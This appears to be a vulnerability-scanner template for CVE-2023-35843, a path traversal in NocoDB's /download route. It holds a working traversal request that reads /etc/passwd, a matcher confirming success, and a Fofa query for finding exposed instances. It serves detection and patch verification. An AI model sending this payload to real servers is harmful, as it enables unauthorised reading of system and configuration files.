id: CVE-2023-35843

info:
  name: NocoDB Arbitrary File Read
  author: laohuan12138
  severity: high
  verified: true
  description: |
    NocoDB through 0.106.0 (or 0.109.1) has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information
    Fofa: title=="NocoDB"
  
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35843
    - https://advisory.dw1.io/60
  
  tags: cve,cve2023,lfi
  created: 2023/06/26

rules:
  r0:
    request:
      method: GET
      path: /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)

expression: r0()
